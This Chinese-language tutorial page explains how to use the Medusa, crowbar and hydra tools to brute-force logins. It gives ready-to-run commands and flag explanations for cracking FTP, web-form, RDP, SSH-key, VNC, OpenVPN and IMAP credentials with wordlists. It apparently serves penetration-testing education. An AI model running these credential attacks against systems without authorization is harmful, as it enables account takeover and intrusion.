当前位置: 首页 > 工具软件 > Crowbar > 使用案例 >

【暴力破解】medusa&crowbar工具

樊烨烨
2023-12-01

Medusa工具

Medusa 的特点稳定性好速度控制得当基于线程支持模块少于hydra(不支持RDP) - WEB-Form支持存在缺陷(只支持登录失败失败方式)使用

medusa # 直接输入显示帮助
$ medusa -d
# -d参数,显示所有支持的模块
$ medusa -M ftp -q
# -q参数,显示指定模块的使用说明
$ medusa -h 1.1.1.1 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
# -h参数,指定目标IP
# -u参数,指定用户名
# -P参数,指定字典文件
# -M参数,指定破解模块
# -m参数,指定网站路劲
$ medusa -h 1.1.1.1 -u admin -P /usr/share/wordlists/rockyou.txt -M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!" -m FORM-DATA:"post?user=&pass=&submit=True"
# USER-AGENT:,指定user-agent
# FROM:,指定网站路劲
# DENY-SIGNAL:,指定认证失败时,匹配的字段
# FORM-DATA:,指定认证传递的参数

其他参数:

# -f参数,当破解出一个用户名密码后,停止破解。
# -H参数,指定目标IP文件
# -U参数,指定用户名文件
# -p参数,指定单个密码
# -O参数,指定输出文件
# -n参数,指定端口号
# -t参数,指定并发数
# -s参数,启用ssl

crowbar工具

crowbar工具可以使用ssh秘钥来破解ssh服务器。
支持以下协议:

  • openVPN
  • RDP with NLA
  • SSH秘钥
  • VNC秘钥
    crowbar运行会生成两个文件,log文件存储所有尝试结果,out文件存储所有尝试成功的结果。
crowbar --help #查看工具使用说明

参数说明

# -b参数,破解目标协议
# -c参数,指定单个密码
# -C参数,指定字典文件
# -u参数,指定单个用户名
# -U参数,指定用户名文件
# -s参数,指定目标IP或IP段
# -S参数,指定目标IP文件
# -p参数,指定目标协议端口号(当协议使用非标准端口时)
# -o参数,指定输出文件
# -n参数,指定并发线程
# -k参数,指定ssh或vnc的key文件
# -m参数,指定openVPN的配置文件

命令使用示例

crowbar -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist
# 破解RDP,指定了单个用户和字典文件。用户名不包含域名的场景。

crowbar -b rdp -u DOMAIN\\gokhan alkan -c Aa123456 -s 10.68.35.150/32
crowbar -b rdp -u gokhan alkan@DOMAIN -c Aa123456 -s 10.68.35.150/32
# 当用户名需要包含域名时,用户名写成DOMAIN\\gokhan alkan或gokhan alkan@DOMAIN,两种写法均可。

crowbar -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/id_rsa
# 破解sshkey,指定单个ssh密钥

crowbar -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/
# 破解sshkey,指定多个ssh密钥

crowbar -b vnckey -s 192.168.2.105/32 -p 5902 -k ~/.vnc/passwd
# 破解vnckey

crowbar -b openvpn -s 198.7.62.204/32 -p 1194 -m ~/Desktop/vpnbook.ovpn -k ~/Desktop/vpnbook_ca.crt -u vpnbook -c cr2hudaF
# 破解openVPN

hydra工具

支持的协议:adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

命令使用示例:

$ hydra -l user -P passlist.txt ftp://192.168.0.1
# 破解ftp登录账号
$ hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
# 破解imap登录账号
$ hydra -l admin -p password ftp://[192.168.0.0/24]/
# 破解一个IP段的ftp服务器的登录账号
$ hydra -L logins.txt -P pws.txt -M targets.txt ssh
# 破解ssh登录账号,目标从targets.txt中读取

常用参数说明

# -S参数,指定使用ssl连接
# -s PORT参数,指定端口号,当协议使用非标准端口时使用
# -l LOGIN参数,指定单个用户名
# -L FILE参数,指定用户名文件
# -p PASS参数,指定单个密码
# -P FILE参数,指定密码文件
# -e nsr参数,指定尝试“空密码”“用户名”“倒写用户名”
# -M FILE参数,指定目标服务器IP文件
# -o FILE参数,导出破解结果到文件
# -f参数,当发现破解出一个账号后停止破解
# -t NUM参数,指定任务并发数
 类似资料: